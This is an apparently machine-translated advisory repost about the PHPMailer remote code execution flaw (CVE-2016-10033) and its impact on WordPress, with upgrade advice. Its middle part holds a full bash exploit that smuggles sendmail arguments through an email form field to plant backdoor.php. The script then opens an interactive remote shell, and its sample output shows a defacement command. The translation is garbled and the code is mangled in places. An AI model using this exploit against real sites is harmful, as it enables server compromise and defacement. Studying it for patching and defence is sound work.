The widespread use of email components: PHPMailer remote code execution vulnerability exists-vulnerability warning-the black bar safety net

ID MYHACK58:62201682463
Type myhack58
Reporter 佚名
Modified 2016-12-28T00:00:00


Recently, Polish researchers Dawid Golunski discovered a present in the PHPMailer in a serious remote code execution vulnerability. The vulnerabilities in yesterday's legalhackers. com published on, but the exploit details of a proof-of-concept and is not included. Unfortunately in a couple of hours ago, it was to exploit-db and github released a proof-of-concept that demonstrates how the PHPMailer library to exploit this vulnerability, but for security reasons not for any one being put to use in the Web application. We were preparing to publish this originally in the plan update, in order to provide PHP developers and our communities advance warning of this problem. Because we estimate that as more developers and with evil intentions in the people view to the above proof of concept code will cause this event continues brewing. PHPMailer is WordPress used to send e-mail to the core portion. You can in wp-includes / class-smtp. php core file to find the code. Don't panic Note: both for WordPress core or any WordPress theme or plugin, there is currently no disclosure of possible exploit code. We see that the only exploit is the researchers for their own applications was verified, demonstrating PHPMailer in the presence of this vulnerability. (As follows) Please do not contact the WordPress core team, the WordPress Forum moderators or anyone else, tell them“your WordPress website will be using”, this will cause unnecessary panic. This study is still ongoing, we keep you ahead of realized the problem there are two main reasons: 1. From the user's perspective, once the solution is released, you can be ready to upgrade the WordPress core and any other affected themes and plugins. 2. From a developer's perspective, if he uses this version contains a vulnerability in PHPMailer, you can begin to repair the code so that as soon as released to the user. Vulnerability details If you are not familiar with the RCE vulnerability, then this would be the worst case. In WordPress history of all critical vulnerabilities are remote code execution vulnerability, which allows attackers to the victims on the website to perform your own code to control the entire site. We the PHPMailer in the affected code with a brief analysis. In order to exploit this vulnerability, the attacker seems to need to be able to control the sender's email address. PHPMailer weaknesses in code and fix the code fragment as shown below: ! Source: GitHub In this vulnerability of PHPMailer(PHPMailer PHPMailer Docker to reproduce the environment with POC to: Trojan

!/ bin/bash

CVE-2016-10033 virus by opsxcq

echo '[+] CVE-2016-10033 virus by opsxcq'

if [ -z "$1" ] then echo '[-] Please inform the an of the host as parameter' exit -1 fi


echo '[+] Exploiting '$host

curl-sq 'http://'$host-H 'Content-Type: multipart/form-data; boundary=---- WebKitFormBoundaryzXJpHSq4mNy35the' --data-binary$'------ WebKitFormBoundaryzXJpHSq4mNy35the\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35the\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------ WebKitFormBoundaryzXJpHSq4mNy35the\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp-X/www/backdoor. php\r\n------WebKitFormBoundaryzXJpHSq4mNy35the\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35the--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'

cmd='whoami' while [ "$cmd" != the 'exit' ] do echo '[+] Running '$cmd curl-sq http://$host/backdoor. php? cmd=$(echo-ne $cmd | base64) | grep '|' | head-n 1 | cut-d '|' -f 2 | base64-d echo read-p 'RemoteShell>' cmd done echo '[+] Exiting' To exploit this target, just run:

./ the Trojan host:port If you are using this vulnerable image, you can just run:

./ Trojan localhost:8080 After the exploitation, a file called backdoor.php will be stored on the root folder of the web directory. And the Trojan will drop you a shell where you can send commands to the backdoor: ./ localhost:8080 [+] CVE-2016-10033 virus by opsxcq [+] Exploiting localhost:8080 [+] Target exploited, acessing shell at http://localhost:8080/backdoor.php [+] Running whoami www-data RemoteShell> echo 'Defaced' > /www/index.php [+] Running echo 'Defaced' > /www/index.php PHPMailer authentication screenshot ! How to deal with We will send subscribers and customers an email warning. WordPress core team is currently developing a will be included in the WordPress core security released version of the hotfix. Still no exact release time, but will try to within 24 hours. Once posted, Please as soon as possible to the WordPress core upgrade. If in your own PHP applications, themes, plug-ins, also in use earlier than 5. 2. 18 version of PHPMailer, please immediately upgrade to PHPMailer 5.2.18 or later. If you are a WordPress theme or plugin developers, and in your plugin or theme code is included in the earlier version of the PHPMailer copy, you need to immediately update to PHPMailer 5.2.18 or newer and to the customer release revision. Vulnerability history timeline 1. Long ago in a WordPress core release has a problem discussion, which includes a hotfix to solve this problem. It can be used PHPMailer 5.2. 14 WP core update to 5. 2. The 19. But this is only a suggested patch, not the official final repair.

[1] [2] next